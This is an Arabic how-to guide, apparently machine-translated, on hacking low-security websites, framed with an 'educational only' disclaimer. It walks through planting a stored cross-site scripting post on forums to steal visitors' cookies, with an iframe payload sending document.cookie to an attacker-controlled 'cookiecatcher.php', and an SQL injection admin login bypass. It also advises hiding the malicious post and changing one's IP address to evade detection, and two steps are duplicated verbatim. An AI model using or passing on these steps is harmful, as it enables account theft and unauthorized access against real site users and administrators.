المحتوى

• خطوات
• نصائح
• تحذيرات

تنبيه: يجب استخدام هذا الدليل للأغراض التعليمية فقط ، إما لمساعدة الأشخاص على بدء تعلم "المتسللين البيض" أو لمعرفة كيفية عمل المتسللين من أجل حماية مواقعهم الإلكترونية بشكل أفضل. سيعطيك هذا البرنامج التعليمي خطوات للوصول إلى العديد من مواقع الويب ذات مستوى الأمان المنخفض.

خطوات

الطريقة الأولى من 3: استخدام "البرمجة النصية عبر المواقع"

1. ابحث عن موقع ويب ضعيف حيث يمكنك نشر المحتوى. المنتدى هو مثال جيد. تذكر ، إذا كان الموقع آمنًا ، فلن تعمل هذه الطريقة.
2. قم بإنشاء منشور. سيتعين عليك إدخال رمز خاص لـ "المنشور" الذي سيجمع بيانات كل من ينقر عليه.
   • سترغب في إجراء اختبار لمعرفة ما إذا كان النظام يسمح بنشر الرموز أو تصفيتها. اكتبه تنبيه ("اختبار") (إزالة "..."). إذا ظهر مربع تنبيه عند النقر فوق منشورك ، فإن الموقع عرضة للهجوم.
3. ابحث عن موقع ويب ضعيف حيث يمكنك نشر المحتوى. المنتدى هو مثال جيد. تذكر ، إذا كان الموقع آمنًا ، فلن تعمل هذه الطريقة.
4. قم بإنشاء منشور. سيتعين عليك إدخال رمز خاص لـ "المنشور" الذي سيجمع بيانات كل من ينقر عليه.
   • سترغب في إجراء اختبار لمعرفة ما إذا كان النظام يسمح بنشر الرموز أو تصفيتها. اكتبه تنبيه ("اختبار") (إزالة "..."). إذا ظهر مربع تنبيه عند النقر فوق منشورك ، فإن الموقع عرضة للهجوم.
5. إنشاء وإرسال "ملف تعريف الارتباط" الخاص بك. الغرض من هذا الهجوم هو التقاط ملفات تعريف الارتباط للمستخدم ، مما يسمح لك بالوصول إلى حسابك على موقع الويب هذا مع وجود ثغرة أمنية في تسجيل الدخول. ستحتاج إلى "أداة التقاط ملفات تعريف الارتباط" ، والتي ستلتقط ملفات تعريف الارتباط لهدفك وتعيد توجيهك. قم بتحميل "ملف تعريف الارتباط" إلى موقع ويب يمكنه الوصول إلى PHP ويدعمها. ابحث عن أمثلة على "ملف تعريف الارتباط" على الإنترنت.
6. قم بعمل منشور باستخدام البرنامج النصي الخاص بملفات تعريف الارتباط. أدخل الرمز المناسب الذي سيجمع ملفات تعريف الارتباط وإرسالها إلى موقع الويب الخاص بك. يجب عليك وضع بعض النص بعد الرمز لإخفاء منشورك ومنع حذفه.
   • قد يبدو رمز المثال مثل <... iframe ... frameborder = 0 height = 0 width = 0 src = javascript ...: void (document.location = ”YOURURL / cookiecatcher.php؟ C =” + document.cookie )> <... / iframe> (إزالة "...").
7. استخدم ملفات تعريف الارتباط المجمعة. بعد ذلك ، يمكنك استخدام المعلومات الواردة من ملفات تعريف الارتباط ، والتي يجب تخزينها على موقع الويب الخاص بك ، لأي أغراض تحتاجها.

الطريقة 2 من 3: تنفيذ "هجوم الحقن"

1. ابحث عن موقع ويب ضعيف. ستحتاج إلى العثور على موقع ويب ضعيف يحتوي على تسجيل دخول مسؤول يمكن الوصول إليه بسهولة. ابحث في Google عن "admin login.asp".
2. تسجيل الدخول كمسؤول. اكتب admin كاسم المستخدم واستخدم بعض الرموز المعروفة باسم كلمة المرور. الأكثر شيوعًا هي 1 "أو" 1 "=" 1.
3. الصبر. تتطلب هذه الطريقة القليل من التجربة والخطأ.
4. الوصول إلى الموقع. في النهاية ، ستجد السلسلة التي تتيح وصول المسؤول إلى الموقع (إذا كان موقعًا عرضة للهجوم).

طريقة 3 من 3: التحضير للنجاح

1. تعلم لغة برمجة واحدة أو اثنتين. إذا كنت تريد حقًا معرفة كيفية اختراق مواقع الويب ، فأنت بحاجة إلى فهم كيفية عمل أجهزة الكمبيوتر والتقنيات الأخرى. تعلم كيفية استخدام لغات البرمجة مثل Python أو SQL ، بحيث يمكنك التحكم بشكل أفضل في أجهزة الكمبيوتر وتحديد نقاط الضعف في الأنظمة.
2. تعرف على برمجة HTML. تحتاج أيضًا إلى معرفة جيدة بلغة HTML وجافا سكريبت لاختراق مواقع الويب. يستغرق هذا بعض الوقت للتعلم ، ولكن هناك العديد من الطرق المجانية لتعلم HTML مجانًا على الإنترنت.
3. ابحث عن "whitehats". "Whitehats" هي طرق اختراق تستخدم للأبد ، وتكشف نقاط الضعف الأمنية وتجعل الإنترنت مكانًا أفضل للجميع. إذا كنت ترغب في معرفة كيفية الاختراق ، واستخدام تلك المعرفة واستخدام معرفتك للأبد أو إذا كنت ترغب في حماية موقع الويب الخاص بك ، فقد ترغب في الاتصال بقراصنة whitehats للحصول على المشورة.
4. البحث الجاد. إذا كنت تتعلم كيفية الاختراق أو مجرد حماية نفسك ، فستحتاج إلى إجراء الكثير من البحث. هناك العديد من الأشكال المختلفة لنقاط الضعف وهذه القائمة تتغير دائمًا ، لذلك عليك دائمًا مواصلة التعلم.
5. مواكبة. نظرًا لأن قائمة الاختراقات المحتملة تتغير باستمرار ، فأنت بحاجة إلى مواكبة آخر المستجدات. فقط لأنك محمي من اختراق معين اليوم لا يعني أنك ستكون آمنًا في المستقبل!

نصائح

• قم بزيارة منتديات الهاكر للتعرف على العديد من النصائح المفيدة.

تحذيرات

• القرصنة غير قانونية. إذا تم القبض عليك ، فهذا خطأك.
• إذا كنت تحاول الاختراق في العالم الحقيقي ، فقم بتبديل عنوان IP الخاص بك باستخدام البرامج المتاحة عبر الإنترنت.
• إذا قرأت هذا المقال ، فلن تصبح مخترقًا على الفور. يجب أن تستكشف مهاراتك وتتدرب كثيرًا.